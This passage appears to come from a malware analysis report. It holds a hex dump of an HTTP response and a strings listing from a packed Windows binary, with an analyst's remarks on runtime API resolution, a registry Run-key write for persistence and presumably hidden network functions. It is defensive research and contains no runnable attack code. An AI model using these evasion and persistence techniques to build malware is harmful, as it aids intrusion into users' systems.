0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a3c 6872202f 3e0a2020   ose....<hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.


Strings
(Mostly non-printable, high-entropy fragments, as expected for a packed binary. The readable items are the version resource — PrivateBuild 1051, matching the header above — and a small import set: LoadLibraryA/W, GetProcAddress, FreeLibrary, ExitProcess, the Interlocked* pair, RegCreateKeyExA/RegQueryValueExA/RegCloseKey, and GDI/USER32 names such as AlphaBlend, TransparentBlt, CharLowerA and GetKeyState. A static import table this small that still includes LoadLibrary/GetProcAddress is consistent with runtime API resolution by a packer; the registry APIs match the Run-key write observed at runtime. No network APIs appear as static imports, so the HTTP functionality is presumably resolved dynamically — confirm after unpacking.)

040904b0
1051
PrivateBuild
StringFileInfo
TIMES NEW ROMAN
Translation
VarFileInfo
VS_VERSION_INFO
01Ir?`
(?>.\2
2\mgKL
3HRasAq
7,J0`b
;-9hX;op
9yO-o<b
ADVAPI32.dll
AlphaBlend
)a:y@We
~b";V7
CharLowerA
CharNextA
';cyT.
D[+":+
@.data
Dc5'uJ
E4eb9'
E(.hbS@
emY{J\
EnumResourceNamesW
ExitProcess
fe74%BE*
FreeLibrary
fwGK~Pp
)?*fz7Z1
GetClassLongA
GetKeyState
GetProcAddress
GetThreadPriority
)?!*&H>
h?6lm~
/H*M4JZm
&H?*uK)s
hV^>[#
`.hy4@
iljWP*0h|
I>?,)m
InterlockedDecrement
InterlockedIncrement
je.h%P@
J	?V7C
KERNEL32.dll
klL,<:
/Kn>KU
lk])J/
?LlZ]"
LoadLibraryA
LoadLibraryW
lvk4Op
lWu_hV.h"
M+5	(djD
Mk	}x^
MSIMG32.dll
:~My)B
NkH7Tc
%#NkqDW
ntwOoK
|o68;@
<oH(,UJ
oo=?a*
<Qay)Elz4
`.rdata
r%DU`;
RegCloseKey
RegCreateKeyExA
RegQueryValueExA
 RI9Zg
rpjg'cvl
}&(=t;:
!This program cannot be run in DOS mode.
ThlFre
Tj@.hX|@
Tm*I=T8
T\Q7Fe0
TransmitCommChar
TransparentBlt
TV.h,7@
ugRN7V5U
]uLY;/
;{U~nV
USER32.dll
V4jlu|:c
v.h/F@
@wktf;
W~TmtM
X>*/k 
x,LJ/W
xT4]M&
<(YVNK